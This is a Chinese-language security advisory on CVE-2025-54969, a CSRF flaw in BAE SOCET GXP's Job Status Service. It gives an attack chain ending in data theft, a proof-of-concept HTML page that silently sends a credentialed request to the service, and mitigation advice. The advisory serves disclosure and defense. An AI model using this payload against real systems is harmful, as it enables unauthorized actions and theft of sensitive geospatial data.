CVE-2025-54969 BAE SOCET GXP Job Status Service 跨站请求伪造漏洞

漏洞信息

漏洞编号

CVE-2025-54969

漏洞类型

CSRF (跨站请求伪造)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

BAE SOCET GXP

漏洞概述

CVE-2025-54969是BAE Systems公司开发的SOCET GXP地理空间开发产品中的一个中等严重性安全漏洞。该漏洞存在于SOCET GXP的Job Status Service组件中，由于该服务未能实现有效的跨站请求伪造（CSRF）保护机制，攻击者可以利用此漏洞在用户不知情的情况下，以受害者的身份向Job Status Service提交恶意请求。SOCET GXP是一款专业的地理空间图像分析软件，广泛应用于国防、情报收集、地图测绘和地理信息系统（GIS）领域。攻击者通过社会工程学手段，如诱骗合法用户点击恶意链接或访问包含恶意代码的网页，即可在用户已认证的会话中执行未授权的操作。由于该漏洞影响的是企业级地理空间分析工具，攻击成功可能导致敏感地理信息数据的泄露、图像处理任务被恶意操纵，或者在特定场景下造成可用性影响。对于处理敏感地理情报的机构而言，此漏洞可能带来严重的安全风险。CVSS 3.1评分6.1反映了该漏洞在网络环境下可被利用、但需要用户交互和一定社会工程学成本的特点。

技术细节

跨站请求伪造（CSRF）是一种利用用户已认证会话的攻击方式。在CVE-2025-54969漏洞中，SOCET GXP的Job Status Service缺少必要的CSRF令牌验证机制。正常情况下，Web应用程序应在关键操作（如提交作业状态查询、修改配置等）时要求客户端提供有效的CSRF令牌，并验证请求来源。攻击者首先构建一个恶意网页，其中包含自动提交的表单或JavaScript代码，该代码会向SOCET GXP的Job Status Service端点发送HTTP请求。由于浏览器会自动携带目标域名的Cookie信息，如果受害者当时已登录SOCET GXP系统，其浏览器会携带有效的会话Cookie发送请求。服务端由于缺乏CSRF验证，无法区分这是用户合法操作还是来自第三方网站的恶意请求。攻击者可以构造针对Job Status Service的各类合法API调用，如查询作业状态、提交新的图像处理任务或修改作业参数等。建议的修复方案是在服务端实现CSRF令牌机制，要求每个状态修改请求都包含随机生成的令牌，并验证令牌的有效性和请求来源。

攻击链分析

STEP 1

步骤1: 侦察阶段

攻击者识别目标组织使用的BAE SOCET GXP版本，确认其版本低于4.6.0.2，并收集Job Status Service的端点信息

STEP 2

步骤2: 制作恶意页面

攻击者构建包含恶意表单或JavaScript代码的网页，该页面会自动向SOCET GXP Job Status Service发送HTTP请求

STEP 3

步骤3: 社会工程学攻击

攻击者通过钓鱼邮件、即时通讯或其他渠道诱骗已认证用户访问恶意网页，或点击包含恶意代码的链接

STEP 4

步骤4: 自动触发请求

当受害者的浏览器加载恶意页面时，JavaScript代码自动执行，利用用户已登录的会话向Job Status Service发送请求

STEP 5

步骤5: 会话Cookie携带

浏览器自动携带目标域名的Cookie，由于服务缺少CSRF验证，无法区分是否为合法用户操作

STEP 6

步骤6: 未授权操作执行

服务端执行请求中指定的操作，可能导致作业状态信息泄露、图像处理任务被篡改或其他恶意操作

STEP 7

步骤7: 数据外传

攻击者通过JavaScript代码将响应数据（包含敏感地理信息）发送到攻击者控制的服务器，完成数据窃取

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-54969 -->
<!-- BAE SOCET GXP Job Status Service CSRF Exploit -->
<!DOCTYPE html>
<html>
<head>
    <title>SOCET GXP Job Status Query</title>
</head>
<body>
    <h2>Geospatial Image Analysis System</h2>
    <p>Loading job status data...</p>
    
    <!-- Auto-submit form to Job Status Service -->
    <form id="csrfForm" action="https://target-server/socet-gxp/api/jobstatus" method="POST" style="display:none;">
        <input type="hidden" name="action" value="query" />
        <input type="hidden" name="job_id" value="*" />
        <input type="hidden" name="include_details" value="true" />
    </form>
    
    <!-- Alternative: Direct XMLHttpRequest for more control -->
    <script>
        // Wait for page load
        window.onload = function() {
            console.log('[CSRF] Initiating request to SOCET GXP Job Status Service');
            
            // Method 1: Auto-submit form
            // document.getElementById('csrfForm').submit();
            
            // Method 2: XMLHttpRequest with JSON payload
            var xhr = new XMLHttpRequest();
            xhr.open('POST', 'https://target-server/socet-gxp/api/jobstatus', true);
            xhr.setRequestHeader('Content-Type', 'application/json');
            xhr.withCredentials = true;  // Include cookies
            
            xhr.send(JSON.stringify({
                action: 'query',
                job_id: '*',
                include_details: true
            }));
            
            xhr.onload = function() {
                if (xhr.status === 200) {
                    console.log('[CSRF] Request successful - Job status data may have been exposed');
                    console.log('[CSRF] Response:', xhr.responseText);
                }
            };
            
            xhr.onerror = function() {
                console.log('[CSRF] Request failed - Target may be offline or CSRF protection applied');
            };
        };
    </script>
</body>
</html>

影响范围

BAE SOCET GXP < 4.6.0.2

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1）限制用户访问SOCET GXP系统的网络范围，避免从不受信任的网络访问；2）配置严格的CSP（内容安全策略）响应头，防止跨域脚本执行；3）使用浏览器安全插件或企业安全网关过滤可疑请求；4）加强对员工的社会工程学攻击意识培训，提醒用户不要点击来源不明的链接；5）监控SOCET GXP系统的异常访问日志，及时发现可能的CSRF攻击行为；6）考虑在反向代理层面实现临时的CSRF保护机制。